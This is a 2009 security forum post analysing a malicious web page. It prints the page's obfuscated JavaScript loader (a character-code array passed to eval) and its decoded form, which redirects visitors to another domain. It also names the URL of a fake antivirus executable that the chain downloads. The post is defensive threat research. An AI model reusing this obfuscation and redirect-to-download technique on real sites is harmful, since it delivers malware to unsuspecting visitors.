Author Topic: golkis.dnip.net  (Read 2326 times)

0 Members and 1 Guest are viewing this topic.

April 04, 2009, 02:48:10 am
Read 2326 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
golkis.dnip.net/online-j49/yornt.html

Relevant code from the source (the following script appears just above the DOCTYPE declaration);

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://golkis.dnip.net/online-j49/yornt.html
Server IP: 78.46.92.150 [ server8.bplaced.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 04 April 2009
Time: 03:41:25:41
*****************************************************************
<script src="uenxfd.js"></script>
<script>aqkgij('yimahira');
</script>

The .js file contains;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://golkis.dnip.net/online-j49/uenxfd.js
Server IP: 78.46.92.150 [ server8.bplaced.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 04 April 2009
Time: 03:42:03:42
*****************************************************************
HTTP/1.1 200 OK
Date: Sat, 04 Apr 2009 02:42:02 GMT
Server: Apache/2.2
Last-Modified: Thu, 02 Apr 2009 10:39:41 GMT
ETag: "236288c-7fe-466900caf9540"
Accept-Ranges: bytes
Content-Length: 2046
Vary: Accept-Encoding
Content-Type: application/javascript

var str=["2300", "2299", "2299", "2299", "2408", "2387", "2404", "2322", "2402", "2401", "2408", "2351", "2338", "2349", "2300", "2299", "2299", "2299", "2392", "2407", "2400", "2389", "2406", "2395", "2401", "2400", "2322", "2387", "2403", "2397", "2393", "2395", "2396", "2330", "2403", "2407", "2391", "2404", "2411", "2331", "2413", "2300", "2299", "2299", "2299", "2299", "2395", "2392", "2322", "2330", "2402", "2401", "2408", "2351", "2351", "2338", "2331", "2413", "2402", "2401", "2408", "2351", "2339", "2349", "2322", "2405", "2391", "2406", "2374", "2395", "2399", "2391", "2401", "2407", "2406", "2330", "2329", "2387", "2403", "2397", "2393", "2395", "2396", "2330", "2324", "2329", "2333", "2403", "2407", "2391", "2404", "2411", "2333", "2329", "2324", "2331", "2329", "2334", "2322", "2339", "2331", "2349", "2322", "2415", "2322", "2391", "2398", "2405", "2391", "2322", "2413", "2300", "2299", "2299", "2299", "2299", "2409", "2395", "2400", "2390", "2401", "2409", "2336", "2398", "2401", "2389", "2387", "2406", "2395", "2401", "2400", "2351", "2329", "2394", "2406", "2406", "2402", "2348", "2337", "2337", "2393", "2401", "2398", "2397", "2395", "2405", "2385", "2401", "2400", "2398", "2395", "2400", "2391", "2335", "2396", "2342", "2347", "2336", "2399", "2387", "2395", "2400", "2405", "2392", "2395", "2398", "2391", "2336", "2389", "2401", "2399", "2337", "2395", "2400", "2390", "2391", "2410", "2336", "2394", "2406", "2399", "2398", "2353", "2372", "2391", "2392", "2351", "2329", "2333", "2391", "2400", "2389", "2401", "2390", "2391", "2375", "2372", "2363", "2357", "2401", "2399", "2402", "2401", "2400", "2391", "2400", "2406", "2330", "2390", "2401", "2389", "2407", "2399", "2391", "2400", "2406", "2336", "2404", "2391", "2392", "2391", "2404", "2404", "2391", "2404", "2331", "2349", "2300", "2299", "2299", "2299", "2299", "2415", "2300", "2299", "2299", "2299", "2415"];
 var temp='';
 var red='';
 for (i=0; i<str.length; i++){
 red=str[i]-2290;
 temp=temp+String.fromCharCode(red);
 }
 eval(temp);

Which decodes to;

Code: [Select]
var pov=0;
function aqkgij(query){
if (pov==0){pov=1; setTimeout('aqkgij("'+query+'")', 1); } else {
window.location='http://golkis_online-j49.mainsfile.com/index.html?Ref='+encodeURIComponent(document.referrer);
}
}

Rather than post the entire contents of index.html, I'll save you some time - it downloads;

http://easyincomeprotection.cn/installer_90001.exe

.. which the source code says it Antivirus Plus (I've not checked it)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net